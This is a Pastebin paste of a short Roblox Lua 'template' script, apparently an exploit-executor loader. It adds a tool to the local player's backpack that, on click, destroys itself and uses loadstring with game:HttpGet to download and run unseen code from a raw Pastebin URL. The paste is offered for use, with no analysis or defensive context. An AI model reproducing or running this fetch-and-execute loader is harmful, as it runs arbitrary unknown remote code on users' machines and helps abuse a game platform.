Advertisement
oatmeal2009

template

Jul 12th, 2020
37
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.32 KB | None | 0 0
  1. mouse = game.Players.LocalPlayer:GetMouse()
  2. tool = Instance.new("Tool")
  3. tool.RequiresHandle = false
  4. tool.Name = "test"
  5. tool.Activated:connect(function()
  6. mouse.Button1Down:connect(function()
  7. tool:Destroy()
  8. loadstring(game:HttpGet("https://pastebin.com/raw/CTFW0aPp", true))()
  9. end)
  10. end)
  11. tool.Parent = game.Players.LocalPlayer.Backpack
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement